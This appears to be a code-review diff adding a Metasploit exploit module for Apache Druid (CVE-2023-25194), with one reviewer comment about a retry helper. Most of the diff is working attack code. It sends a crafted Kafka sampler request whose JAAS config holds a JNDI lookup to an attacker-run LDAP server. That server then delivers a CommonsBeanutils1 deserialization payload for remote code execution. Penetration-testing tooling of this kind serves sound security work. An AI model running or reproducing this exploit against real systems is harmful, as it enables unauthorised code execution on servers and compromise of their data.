modules/exploits/multi/http/apache_druid_cve_2023_25194.rb

```diff
@@ -0,0 +1,172 @@
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Base path', '/'])
+    ])
+  end
+
+  def wait_until(&block)
+    datastore['WfsDelay'].times do
+      break if block.call
+
+      sleep(1)
+    end
+  end
+
+  def check
+    validate_configuration!
+
+    vprint_status('Attempting to trigger the jndi callback...')
+
+    start_service
+    res = trigger
+    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?
+
+    wait_until { @search_received }
+
+    return Exploit::CheckCode::Unknown('No LDAP search query was received.') unless @search_received
+
+    report_vuln({
+      host: rhost,
+      port: rport,
+      name: name.to_s,
+      refs: references,
+      info: "Module #{fullname} found vulnerable host."
+    })
+
+    Exploit::CheckCode::Vulnerable
+  ensure
+    cleanup_service
+  end
+
+  def build_ldap_search_response_payload
+    return [] if @search_received
+
+    @search_received = true
+
+    return [] unless @exploiting
+
+    print_good('Delivering the serialized Java object to execute the payload...')
+    build_ldap_search_response_payload_inline('CommonsBeanutils1')
+  end
+
+  def trigger
+    data = {
+      type: 'kafka',
+      spec: {
+        type: 'kafka',
+        ioConfig: {
+          type: 'kafka',
+          consumerProperties: {
+            "bootstrap.servers": '127.0.0.1:6666',
+            "sasl.mechanism": 'SCRAM-SHA-256',
+            "security.protocol": 'SASL_SSL',
+            "sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"#{jndi_string}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
+          },
+          topic: 'test',
+          useEarliestOffset: true,
+          inputFormat: { type: 'regex', pattern: '([\\s\\S]*)', listDelimiter: '56616469-6de2-9da4-efb8-8f416e6e6965', columns: ['raw'] }
+        },
+        dataSchema: { dataSource: 'sample', timestampSpec: { column: '!!!_no_such_column_!!!', missingValue: '1970-01-01T00:00:00Z' }, dimensionsSpec: {}, granularitySpec: { rollup: false } },
+        tuningConfig: { type: 'kafka' }
+      },
+      samplerConfig: { numRows: 500, timeoutMs: 15000 }
+    }
+
+    @search_received = false
+
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri, '/druid/indexer/v1/sampler') + '?for=connect',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => data.to_json
+    )
+  end
+
+  def exploit
+    validate_configuration!
+    @exploiting = true
+    start_service
+    res = trigger
+    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 400
+
+    wait_until { @search_received && (!handler_enabled? || session_created?) }
```

Comment:
You might be able to change this to `retry_until_truthy`. The only block that will need to be passed in will be `@search_received`